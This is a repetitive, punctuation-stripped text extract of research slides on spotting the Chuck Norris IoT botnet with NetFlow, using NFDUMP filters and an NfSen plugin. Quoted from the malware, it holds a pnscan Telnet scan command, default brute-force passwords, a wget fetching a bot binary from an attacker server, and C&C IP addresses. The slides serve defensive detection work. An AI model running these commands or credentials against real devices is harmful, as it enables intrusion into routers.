(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
http
syslog
incident
reporting
mailbox
WWW
syslog
server
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
From NetFlow Monitoring to Botnet Discovery
Network Behaviour Analysis at MU
Identifies malware from NetFlow dataWatch whatrsquos happening inside the network 247Single purpose detection patterns (scanning botnets )Complex models of the network behavior
Even Chuck Norris Canrsquot Resist NetFlow Monitoring
Unusual worldwide TELNET scan attemptsMostly comming from ADSL connectionsNew botnet Chuck Norris discovered at December 2009Detailed analysis followed
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 7 28
Part II
Chuck Norris Botnet in a Nutshell
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 8 28
Chuck Norris Botnet
Linux malware ndash IRC bots with central CampC serversAttacks poorly-configured Linux MIPSEL devicesVulnerable devices ndash ADSL modems and routers
Uses TELNET brute force attack for infectionUsers are not aware about the malicious activitiesMissing anti-malware solution to detect it
Discovered at Masaryk University on 2 December 2009 The malware got the ChuckNorris moniker from a comment in its source code [R]anger Killato in nomedi Chuck Norris
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 9 28
Botnet Lifecycle
Scanning for vulnerable devices in predefined networksIP prefixes of ADSL networks of worldwide operatorsnetwork scanning ndash pnscan -n30 88102106024 23
Infection of a vulnerable deviceTELNET dictionary attack ndash 15 default passwordsadmin password root 1234 dreambox blank password
IRC bot initializationIRC bot download and execution on infected device wget http879816386pwnsyslgd
Botnet CampC operationsfurther bots spreading and CampC commands executionDNS spoofing and denial-of-service attacks
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 10 28
More about Chuck Norris Botnet
Chuck Norris botnet lifecycle in details and furtherinformation are available at the CYBER project page
httpwwwmuniczicscyberchuck_norris_botnet
3 wget scan-tools
webserver
2 Topic init-cmd (get scan-tools)
1 join soldiersCampC(IRC)serverSTOP
bot
stop remote access(ports 22-80)
infecteddevice
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 11 28
Part III
Botnet Detection Methods
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 12 28
Detection Methods Overview
Five Detection Methods
Telnet scan detectionConnections to botnet distribution sites detectionConnections to botnet CampC centers detectionDNS spoofing attack detectionADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filtersImplemented to NfSen collector
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 13 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
NFDUMP detection filter
(net local_network) and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
NetFlow Monitoring at Masaryk University
FlowMon
probe
FlowMon
probe
FlowMon
probe
NetFlowdata
generation
NetFlow
collector
NetFlow
v5v9
NetFlowdata
collection
NetFlowdata
analyses
SPAM
detection
wormvirus
detection
intrusion
detection
http
syslog
incident
reporting
mailbox
WWW
syslog
server
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 6 28
From NetFlow Monitoring to Botnet Discovery
Network Behaviour Analysis at MU
Identifies malware from NetFlow dataWatch whatrsquos happening inside the network 247Single purpose detection patterns (scanning botnets )Complex models of the network behavior
Even Chuck Norris Canrsquot Resist NetFlow Monitoring
Unusual worldwide TELNET scan attemptsMostly comming from ADSL connectionsNew botnet Chuck Norris discovered at December 2009Detailed analysis followed
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 7 28
Part II
Chuck Norris Botnet in a Nutshell
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 8 28
Chuck Norris Botnet
Linux malware ndash IRC bots with central CampC serversAttacks poorly-configured Linux MIPSEL devicesVulnerable devices ndash ADSL modems and routers
Uses TELNET brute force attack for infectionUsers are not aware about the malicious activitiesMissing anti-malware solution to detect it
Discovered at Masaryk University on 2 December 2009 The malware got the ChuckNorris moniker from a comment in its source code [R]anger Killato in nomedi Chuck Norris
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 9 28
Botnet Lifecycle
Scanning for vulnerable devices in predefined networksIP prefixes of ADSL networks of worldwide operatorsnetwork scanning ndash pnscan -n30 88102106024 23
Infection of a vulnerable deviceTELNET dictionary attack ndash 15 default passwordsadmin password root 1234 dreambox blank password
IRC bot initializationIRC bot download and execution on infected device wget http879816386pwnsyslgd
Botnet CampC operationsfurther bots spreading and CampC commands executionDNS spoofing and denial-of-service attacks
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 10 28
More about Chuck Norris Botnet
Chuck Norris botnet lifecycle in details and furtherinformation are available at the CYBER project page
httpwwwmuniczicscyberchuck_norris_botnet
3 wget scan-tools
webserver
2 Topic init-cmd (get scan-tools)
1 join soldiersCampC(IRC)serverSTOP
bot
stop remote access(ports 22-80)
infecteddevice
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 11 28
Part III
Botnet Detection Methods
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 12 28
Detection Methods Overview
Five Detection Methods
Telnet scan detectionConnections to botnet distribution sites detectionConnections to botnet CampC centers detectionDNS spoofing attack detectionADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filtersImplemented to NfSen collector
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 13 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
NFDUMP detection filter
(net local_network) and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
